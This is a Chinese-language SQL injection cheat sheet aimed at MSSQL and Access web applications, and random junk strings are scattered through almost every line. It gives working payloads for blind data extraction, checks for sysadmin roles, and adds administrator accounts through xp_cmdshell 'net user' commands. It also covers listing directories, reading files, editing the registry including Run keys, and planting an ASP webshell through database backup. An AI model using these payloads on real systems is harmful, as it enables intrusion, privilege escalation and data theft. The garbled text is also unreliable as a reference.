1.判断是否有注入;and 1=1 ;and 1=2 eVR5Xar
2.初步判断是否是mssql ;and user>0 yCXrVN:`,
37q@rDm2
3.注入参数是字符'and [查询条件] and ''=' ~+H"
-+
Cv*x2KF
G
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 2iU7 0(H
a2f^x@0k
5.判断数据库系统 >z%Q>(F
6MG9a>=
;and (select count(*) from sysobjects)>0 mssql o%4Gd~
Pa^A$fy\
;and (select count(*) from msysobjects)>0 access ph}j[Co
:qvI%1cP=
)g|xpb
jS!`2li?{
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `' 153M]
Ln.ZVMZ;
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Xwa_3Xm*Le
/oL;YIoQX
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 x-'~Bu
NJ MJ
9.(1)猜字段的ascii值(access) X]y)ZF26
gUAxyV
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 v`c$!L5
v6GsoQmA
(2)猜字段的ascii值(mssql) 3^StIw{X
$3d}"D
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;D.h65rr
m))<!3
10.测试权限结构(mssql) id?#TqD
Q*YYTmZ
H2r8,|XL
@-)tM.8~
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- T'#!~GpB
#u5~0,F
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- a1.|X i'/z
8CC/ BOe
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ,SScf98,j
u=&Bmn_
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- D%7kBfCb
RkuuogZ
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 9]>iSG^H
d"U(`E=H9
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #g5^SR|qE
aVe/
gE
;and 1=(select IS_MEMBER('db_owner'));-- GOSI3RRn
_0pO8o-x
}sxn72,
)ZejQ}$
11.添加mssql和系统的帐户 ;U`X 6d
R
4wr
;exec master.dbo.sp_addlogin username;-- +jqj6O@Tjr
;exec master.dbo.sp_password null,username,password;-- jAND7&W
aj~bt-cE
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ]bgY6@M
j}+5vB|0
;exec master.dbo.xp_cmdshell 'net user username password [WB{T3j
~JuKV&&}K
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- S)A'Y]2X
3|rn] yZ
;exec master.dbo.xp_cmdshell 'net user username password /add';-- (vJ2z
=z
(shK
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- >?YNW
@-#T5?
O4No0xeWo
`!G7k
12.(1)遍历目录 M8@_Uj
*OdX u&5
;create table dirs(paths varchar(100), id int) cgj.e
s(&;q4|
;insert dirs exec master.dbo.xp_dirtree 'c:\' #vf_D?^
l#@&~f[
;and (select top 1 paths from dirs)>0 p8, 0lo
cX
A t:m
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 1Qh`6Ya f
/.=r>a}l
2 [!Mx&^
&!y]:CC{
(2)遍历目录 kDB iBNdB
m]IysyFFK
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- !Zbesp KZ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 >sj
bK%
2 Y|D'^
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ,vG<*|pn
:+,st&(E
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 d<@Mdo<;?g
T+RZ
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 vN{-?
`ycU-m==
~2/{3m{3 A
~F#A
Pt
13.mssql中的存储过程 OCHm;
\~X&o% y
xp_regenumvalues 注册表根键, 子键 -{9Gagy2&
zfjTQMaxh
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (:Cc3
%^9:%ytt
xp_regread 根键,子键,键值名 `W[+%b
XLTD;[jO
;exec xp_regread rF'R>/H
B50 [O!
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 (BERY
k_3j
'
xp_regwrite 根键,子键, 值名, 值类型, 值 qa}>i&uO
CtT~0Y|
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;o$;Z4:.D
;IC'Gq
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 KtTza5aF
kb|eQtH
xp_regdeletevalue 根键,子键,值名 bZ#X9fT
'Kis hXOn]
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 IMad$AKc
lug}
Uj
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 2q%K)h
*=vlqpG
3$"/>g/
kUHie
14.mssql的backup创建webshell C(,=[Fi-
G[q9A$yw
use model 0RyFv+
PZ34 *q
create table cmd(str image); 7Qh_8M
?mOg@) wx
insert into cmd(str) values (''); <pOl[5v]
*fP(6e#G,
backup database model to disk='c:\l.asp'; #'>?:k
S!7g)
pN$;!
\$;~74}
15.mssql内置函数 Z5>V{o
<F=Dj*]
;and (select @@version)>0 获得Windows的版本号 Lp~^*j(
b~W)S/wF$P
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ZPF7m{S
Lht[g9
;and (select user_name())>0 爆当前系统的连接用户 uu>lDvR*
(/fT]6(
;and (select db_name())>0 得到当前连接的数据库 )C}KR`"
\Hs|$
5OB]x?4]
79z)C35~
16.简洁的webshell b5Q8pWZg,
uMDtdC8
use model GEtbs+ [
SOH%Q_
create table cmd(str image); d~<QAh#rG
wsfysat$
insert into cmd(str) values (''); @xJCn}`Zj
] SK[C"
S
backup database model to disk='g:\wwwtest\l.asp';